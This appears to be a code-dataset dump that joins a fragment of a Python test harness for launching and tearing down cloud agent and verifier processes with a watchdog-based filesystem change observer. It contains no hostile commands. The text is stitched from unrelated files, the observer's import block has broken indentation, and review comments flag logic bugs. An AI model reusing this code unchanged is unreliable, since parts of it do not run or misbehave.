                config_file_path, 'general', 'cloudagent_port', cloudagent_port_read_from_file)
            port_string_length = len(cloudagent_port_read_from_file)
            contrived_uuid = test_agent_uuid[:-port_string_length]
            contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
            self.overwrite_config_file(
                config_file_path, 'general', 'agent_uuid', contrived_uuid)
            cn_process_list.append(subprocess.Popen(
                "python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
            # NOTE(review): this computed port is never used afterwards —
            # the next iteration re-reads the file.
            cloudagent_port = int(cloudagent_port_read_from_file) + 1
        # time.sleep(2)
        self.overwrite_config_file(
            common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
    print("done creating cloud agents, waiting for them to start...")
    time.sleep(10)
    print("starting test...")
def kill_cloudagents_after_delay(self, argument):
    """Cleanup hook: after argument["sleep"] seconds, deregister every
    contrived agent from the cloud verifier, delete the per-port sandbox
    directories, and SIGTERM the recorded agent process groups.

    Mirrors launch_cloudagents(): ports come either from a fixed
    starting_port or line-by-line from port_file.
    """
    sleep_time = argument.get('sleep')
    time.sleep(sleep_time)
    # self.launch_cloudverifier(None)
    port_file = argument.get('port_file')
    cloudagent_start_port = argument.get('starting_port')
    num_cloudagent_instances = argument['num_cloudagent_instances']
    if cloudagent_start_port is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        for cn in range(num_cloudagent_instances):
            new_dir = r'../cloudagent_on_port_' + \
                str(cloudagent_start_port)
            shutil.rmtree(new_dir)
            # NOTE(review): this increments a throwaway variable instead of
            # cloudagent_start_port, so every iteration targets the same
            # directory — confirm intent.
            cloudagent_port = cloudagent_start_port + 1
    elif port_file is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        test_agent_uuid = parser.get('general', 'agent_uuid')
        for cn in range(num_cloudagent_instances):
            cloudagent_port_read_from_file = self.read_line_in_file(
                port_file, cn).strip()
            # Rebuild the contrived uuid exactly as launch_cloudagents() did.
            port_string_length = len(cloudagent_port_read_from_file)
            contrived_uuid = test_agent_uuid[:-port_string_length]
            contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
            params = {
                'agent_id': contrived_uuid,
            }
            try:
                print(("Sending #" + str(cn) +
                       " DELETE request to CV for uuid: " + contrived_uuid))
                response = tornado_requests.request("DELETE",
                                                    "http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
                                                    params=params)
                if response.status_code != 200:
                    self.fail("Delete of agent_id " +
                              contrived_uuid + " failed.")
            except Exception as e:
                self.fail("Delete of agent_id " + contrived_uuid +
                          " failed with exception: %s" % e)
        # Second pass: remove the sandbox directories.
        for cn in range(num_cloudagent_instances):
            cloudagent_port_read_from_file = self.read_line_in_file(
                port_file, cn).strip()
            new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
            shutil.rmtree(new_dir)
    # The agents were started with preexec_fn=os.setsid, so each Popen pid
    # doubles as its process-group id for killpg.
    for the_pid in cn_process_list:
        print(("killing pid" + str(the_pid)))
        os.killpg(the_pid, signal.SIGTERM)
def kill_cloudverifier(self, argument):
    """Postrun hook: terminate the verifier started by launch_cloudverifier()."""
    cv_process.kill()
    return True

def launch_cloudagent(self, argument):
    """Prerun hook: start a single cloud agent subprocess.  Returns True."""
    readKUV()
    global cn_process
    cn_process = subprocess.Popen("python cloud_agent.py", shell=True)
    time.sleep(1)  # give the server a moment to start listening
    return True

def kill_cloudagent(self, argument):
    """Postrun hook: terminate the agent started by launch_cloudagent()."""
    cn_process.kill()
    return True

def launch_required_servers(self, argument):
    """Convenience hook: bring up both the cloud agent and the verifier."""
    self.launch_cloudagent(argument)
    self.launch_cloudverifier(argument)
    return True

def kill_required_servers(self, argument):
    """Convenience hook: tear down both servers."""
    self.kill_cloudagent(argument)
    self.kill_cloudverifier(argument)
    return True
def new_thread(self, args):
    """Concurrency factory: create (but do not start) a request_task worker.

    args[0] must be the shared queue; a freshly generated agent uuid is
    pushed onto it for the worker to consume, and the full `args` tuple
    is forwarded to request_task().
    """
    shared_queue = args[0]
    shared_queue.put(str(uuid.uuid4()))
    return threading.Thread(target=self.request_task, args=args)
def execute_test_function_set(self, setup_or_state_change_or_validation):
    """Run every test function listed under the given phase key
    ("setup_functions", "state_change_functions" or
    "state_validation_functions") of this test's table entry.

    Each function runs test_iterations times (default 1), either inline
    or — when a "concurrency" dict is present — fanned out over
    concurrency["instances"] threads created by the named
    new_thread_function.
    """
    # look up the test record
    test_record = self.test_table.get(self._testMethodName)
    # perform each of the test functions and store the results
    change_or_validation = test_record.get(
        setup_or_state_change_or_validation)
    if change_or_validation is not None:
        for test_functions in test_record[setup_or_state_change_or_validation]:
            # full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
            # http_request_body_tag = test_functions.get("http_request_body")
            # http_request_body_file_tag = test_functions.get("http_request_body_file")
            # if http_request_body_tag != None and http_request_body_file_tag != None :
            #     self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
            #
            # thedata = ''
            # if http_request_body_tag == None and http_request_body_file_tag != None:
            #     thedata = open(http_request_body_file_tag).read()
            # else:
            #     thedata=http_request_body_tag
            # verb = test_functions.get("http_request_verb")
            # query = test_functions.get("http_request_query","")
            # test_functions.get("http_request_header")
            # req_header = test_functions.get("http_request_header")
            concurrent_instances = None
            concurrent_new_thread_function = None
            concurrency_dict = test_functions.get("concurrency")
            if concurrency_dict is not None:
                concurrent_instances = concurrency_dict.get("instances")
                concurrent_new_thread_function = concurrency_dict.get(
                    "new_thread_function")
                # Both concurrency fields are mandatory once the tag exists.
                if concurrent_instances is None or concurrent_new_thread_function is None:
                    self.fail("Test " + self._testMethodName + ":" +
                              test_functions["function_name"] + ' contains concurrency agent without mandatory \\"instances\\" or and \\"new_thread_function\\" specifiers')
            for test_iteration in range(int(test_functions.get("test_iterations", "1"))):
                if concurrent_instances is None:
                    # do it inline on this thread
                    self.execute_the_test(
                        setup_or_state_change_or_validation, test_functions, test_iteration)
                else:
                    threads = []
                    for count in range(concurrent_instances):
                        # NOTE(review): `queue` here is a shared module-level
                        # object (not a local) — confirm it is created at
                        # import time.
                        args = (queue, setup_or_state_change_or_validation,
                                test_functions, test_iteration)
                        # call the new_thread_function specified in the test table under concurrency tag.
                        # the new_thread_function is responsible for setting up the task, and creating the new thread.
                        # the task given to the thread must not block and call task_done() on completion regardless of success or failure
                        new_thread = getattr(
                            self, concurrent_new_thread_function)(args)
                        threads.append(new_thread)
                    # start the threads
                    for t in threads:
                        t.start()
                    # blocks until all tasks have called task_done()
                    queue.join()
                    # blocks until all threads are complete
                    for t in threads:
                        t.join()
def execute_test_definition(self):
    """Drive a complete table-defined test: optional prerun hook, the three
    test-function phases in order, then the optional postrun hook.

    Hook entries are dicts with "name" (a method on self) and "args".
    """
    test_record = self.test_table.get(self._testMethodName)

    prerun_spec = test_record.get("prerun_function")
    if prerun_spec is not None:
        getattr(self, prerun_spec.get("name"))(prerun_spec.get("args"))

    for phase in ("setup_functions", "state_change_functions", "state_validation_functions"):
        self.execute_test_function_set(phase)

    postrun_spec = test_record.get("postrun_function")
    if postrun_spec is not None:
        getattr(self, postrun_spec.get("name"))(postrun_spec.get("args"))
def setUp(self):
    # No per-test setup: each scenario drives its own prerun_function.
    pass

def tearDown(self):
    # os.killpg(self.cloudverifier_process.pid, signal.SIGKILL)
    # No per-test teardown: postrun_function hooks handle process cleanup.
    pass
if __name__ == "__main__":
    # import sys;sys.argv = ['', 'Test.testName']
    # Run every test_* method in this module via the unittest runner.
    unittest.main()
|
script.py | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
try:
import queue
except ImportError:
import Queue as queue
import argparse
import importlib
import os
import sys
import threading
from spreadflow_observer_fs.protocol import MessageFactory
from pathtools.patterns import match_path, filter_paths
from watchdog.events import PatternMatchingEventHandler
class EventHandler(PatternMatchingEventHandler):
    """Translate watchdog filesystem events into (deletes, inserts) batches.

    Each handled event appends the affected path(s) to internal lists and
    flush() pushes them onto `changes_queue` as a pair of tuples.  A file
    modification is represented as a delete followed by an insert of the
    same path, so consumers can treat the queue as a pure set-delta stream.
    """

    def __init__(self, pattern, changes_queue):
        # Watch only files (not directories) matching the single pattern,
        # case-insensitively.
        super(EventHandler, self).__init__(patterns=[pattern],
                                           ignore_patterns=None, ignore_directories=True,
                                           case_sensitive=False)
        self._changes_queue = changes_queue
        # Paths accumulated since the last flush.
        self._inserts = []
        self._deletes = []

    def on_moved(self, event):
        # A move may cross the pattern boundary: record the delete only if
        # the source matched, the insert only if the destination matches.
        if event.src_path and match_path(event.src_path,
                                         included_patterns=self.patterns,
                                         excluded_patterns=self.ignore_patterns,
                                         case_sensitive=self.case_sensitive):
            self._deletes.append(event.src_path)
        if event.dest_path and match_path(event.dest_path,
                                          included_patterns=self.patterns,
                                          excluded_patterns=self.ignore_patterns,
                                          case_sensitive=self.case_sensitive):
            self._inserts.append(event.dest_path)
        self.flush()

    def on_created(self, event):
        self._inserts.append(event.src_path)
        self.flush()

    def on_deleted(self, event):
        self._deletes.append(event.src_path)
        self.flush()

    def on_modified(self, event):
        # Modification = remove old content, add new content.
        self._deletes.append(event.src_path)
        self._inserts.append(event.src_path)
        self.flush()

    def flush(self):
        # Emit a batch only when there is something to report.
        if len(self._inserts) or len(self._deletes):
            self._changes_queue.put((tuple(self._deletes), tuple(self._inserts)))
            self._inserts = []
            self._deletes = []
class WatchdogObserverCommand(object):
    """Watch a directory tree and stream filesystem-change messages to a
    binary output stream.

    The class attributes double as argparse defaults because run() parses
    with namespace=self — argparse only assigns attributes that are not
    already present, so the observer_class default survives when the -o
    option is omitted.
    """

    query = None
    native_query = None
    directory = None
    observer_class = 'watchdog.observers.Observer'

    def __init__(self, out=None):
        """Bind the binary output stream; defaults to stdout."""
        if out is None:
            try:
                # Python 3 does not allow us to write binary data to stdout.
                # Except if we use the buffer directly :/
                # http://stackoverflow.com/a/908440/2779045
                self._out = sys.stdout.buffer  # pylint: disable=no-member
            except AttributeError:
                self._out = sys.stdout
        else:
            # BUGFIX: a caller-supplied stream was previously ignored,
            # leaving self._out unset and crashing on the first write.
            self._out = out

    def load_observer(self, fqcn):
        """Resolve a fully qualified class name ("pkg.mod.Class") to the
        class object.  Raises ValueError/ImportError/AttributeError on a
        malformed or unresolvable name.
        """
        module_name, class_name = fqcn.rsplit(".", 1)
        observer_module = importlib.import_module(module_name)
        return getattr(observer_module, class_name)

    def run(self, args):
        """Parse argv-style `args`, emit inserts for all pre-existing
        matching files, then stream change batches until stdin reaches EOF
        or a keyboard interrupt occurs.
        """
        parser = argparse.ArgumentParser(prog=args[0])
        parser.add_argument('directory', metavar='DIR',
                            help='Base directory')
        parser.add_argument('query', metavar='PATTERN',
                            help='Pattern or query string')
        parser.add_argument('-n', '--native-query', action='store_true',
                            help='PATTERN is a native query for the selected observer')
        parser.add_argument('-o', '--observer-class', metavar='CLASS',
                            help='Specify the watchdog observer implementation (fully qualified class name).')
        # Parsed options land directly on this instance (namespace=self).
        parser.parse_args(args[1:], namespace=self)

        try:
            Observer = self.load_observer(self.observer_class)
        except (ImportError, AttributeError, ValueError):
            # Narrowed from a bare except so SystemExit/KeyboardInterrupt
            # are no longer swallowed here.
            parser.error("Watchdog observer implementation not found")

        changes_queue = queue.Queue()
        stop_sentinel = object()

        def stdin_watch():
            # Block until stdin reaches EOF, then ask the main loop to stop.
            while sys.stdin.read():
                pass
            changes_queue.put(stop_sentinel)

        stdin_watch_thread = threading.Thread(target=stdin_watch)
        stdin_watch_thread.start()

        pattern = self.query
        if not self.native_query:
            # Plain patterns are matched against the path tail.
            pattern = '*/' + pattern

        event_handler = EventHandler(pattern, changes_queue)
        observer = Observer()
        observer.schedule(event_handler, self.directory, recursive=True)
        observer.start()

        factory = MessageFactory()

        # Seed the stream with inserts for every file that already exists.
        for root, dirs, files in os.walk(os.path.abspath(self.directory)):
            paths = [os.path.join(root, f) for f in files]
            inserts = tuple(filter_paths(paths, included_patterns=[pattern], case_sensitive=False))
            if len(inserts):
                changes_queue.put((tuple(), tuple(inserts)))

        while True:
            try:
                # NOTE(review): timeout is in seconds, so this waits up to
                # ~16 minutes per cycle — confirm a plain blocking get was
                # not intended.
                item = changes_queue.get(timeout=1000)
                if item == stop_sentinel:
                    break
                (deletable_paths, insertable_paths) = item
                # Stat each inserted path; silently drop files that
                # vanished between the event and now.
                insertable_meta = []
                insertable_paths_ok = []
                for path in insertable_paths[:]:
                    try:
                        insertable_meta.append({'stat': tuple(os.stat(path))})
                        insertable_paths_ok.append(path)
                    except OSError:
                        continue
                for msg in factory.update(deletable_paths, tuple(insertable_paths_ok), tuple(insertable_meta)):
                    self._out.write(msg)
                self._out.flush()
                changes_queue.task_done()
            except queue.Empty:
                pass
            except KeyboardInterrupt:
                break

        observer.stop()
        observer.join()
        stdin_watch_thread.join()
def main():
    """Console entry point: run the observer command on the process argv."""
    sys.exit(WatchdogObserverCommand().run(sys.argv))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.